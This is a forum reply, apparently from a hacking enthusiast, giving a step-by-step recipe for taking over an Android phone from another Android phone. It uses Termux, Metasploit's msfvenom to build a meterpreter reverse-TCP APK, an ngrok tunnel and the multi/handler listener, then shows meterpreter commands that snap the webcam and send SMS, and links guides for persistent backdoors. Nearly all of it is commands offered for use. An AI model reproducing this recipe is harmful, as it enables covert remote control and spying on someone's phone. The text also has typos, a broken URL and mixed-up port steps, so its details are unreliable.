Hi Benny!
^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!
I am interested in the same topic, and spent a lot of time this week making it all real.
Here is a summary of what I did to pwn my Android phone via my other Android phone:
1) Download Termux on Google play store.
2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh
3) git clone https://github.com/rapid7/metasploit-framework
4) CD metasploit-framework
5) bundle install (takes about 5 minutes)
6) Go to
https://dashboard.ngrok.com/user/signup
And register a port forwarding free.
7) git clone https://github.com/inconshreveable/ngrok
8)CD ngrok
9)./ngrok tokenauth (your ngrok token) one time dealio
10) ping o.tcp.ngrok.io (get the ngrok IP address)
11) ./ngrok tcp 4564
12)open new windows session
Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework.
13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk
This creates payliad on Root directory in Android phone.
14) ./msfconsole
15) msf> use exploit /multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set lport 4564
msf> exploit -j -z
16) run lolz.apk payload on other phone.
Ngrok waiting for session. Mad waiting for session.
Bvoila! Once it connects,
Type sessions -i 1 and see meterpreter.
Type help for commands.
Type command -h for help with a command.
webcam_snap -i 2 -p /sdcard/selfy.jpg
send_sms -d 2149711234 -t "what's up Darren :)"
commands here
https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699
You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/
Manz, your good to pwn.
I also recommend,
Git clone https:///github.com/RajkumrdusadTool-X
200 kali tools for termux!!
I love this pr09.
Please note: Ngrok port randomly changes, so your payload must co-align.
I haven't used evil Droid so maybe you know. ?
- คςเ๔ кɭ๏ฬภ